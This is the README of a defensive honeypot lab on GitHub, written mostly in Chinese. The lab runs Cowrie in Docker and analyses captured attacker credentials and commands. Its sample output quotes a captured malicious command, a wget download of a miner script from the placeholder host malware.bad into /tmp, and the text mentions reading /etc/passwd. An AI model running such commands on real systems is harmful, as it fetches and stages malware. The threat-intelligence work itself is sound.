Eduardo1127/honeypot-threat-intelligence-lab
GitHub: Eduardo1127/honeypot-threat-intelligence-lab
基于 Cowrie 和 Docker 的蜜罐威胁情报实验平台,用于捕获并分析攻击者的凭证、命令和恶意载荷。
Stars: 0 | Forks: 0
# 🍯 蜜罐威胁情报与攻击者遥测实验室



## 📌 项目概述
本仓库包含一个**诱饵蜜罐与威胁情报框架**。它使用 Docker 部署 **Cowrie SSH/Telnet 蜜罐**架构,将攻击者诱骗至伪造的 shell 环境中,捕获其源 IP、尝试使用的凭证以及执行的命令,用于威胁情报分析。
## 🎯 核心威胁情报功能
* **诱饵 SSH 环境:** 模拟易受攻击的 Linux shell 环境,以诱捕自动化僵尸网络和恶意攻击者。
* **按键与会话记录:** 记录攻击者执行的确切命令(`cat /etc/passwd`、下载恶意软件 payload、`wget`)。
* **威胁情报分析:** 解析 JSON 蜜罐遥测数据,以识别最主要的攻击 IP、密码字典和恶意软件 URL。
## 📁 仓库结构
```
honeypot-threat-intelligence-lab/
├── README.md # Main portfolio documentation
├── docker-compose.yml # Cowrie SSH Decoy Honeypot deployment manifest
├── scripts/
│ └── analyze_honeypot.py # Threat Intelligence log parser & analytics script
└── logs/
└── sample_cowrie.json # Simulated raw Cowrie honeypot telemetry events
```
## 🧪 本地执行与验证
运行蜜罐威胁情报分析解析器:
```
python scripts/analyze_honeypot.py
```
### 预期输出:
```
==================================================================
🍯 HONEYPOT THREAT INTELLIGENCE ANALYTICS RUNNER
==================================================================
[+] Parsing Telemetry Log: logs/sample_cowrie.json...
[!] Top Attacking IP Identified: 185.220.101.5 (Attempts: 12)
[!] Most Common Password Spray Attempt: "admin123", "root", "123456"
[!] Captured Malicious Command Payload: "wget http://malware.bad/miner.sh -O /tmp/miner.sh"
==================================================================
[SUCCESS] Threat Intelligence Analysis Complete.
==================================================================
```
## 👨💻 作者与联系方式
* **作品集作者:** Eduardo Mex Rodriguez (EMR)(防御性安全与威胁情报)
* **LinkedIn:** [你的 LinkedIn 个人资料]
* **GitHub:** [@你的-github-用户名]
标签:Docker, Homebrew安装, Python, 威胁情报, 安全, 安全防御评估, 开发者工具, 无后门, 版权保护, 蜜罐, 证书利用, 请求拦截, 超时处理, 逆向工具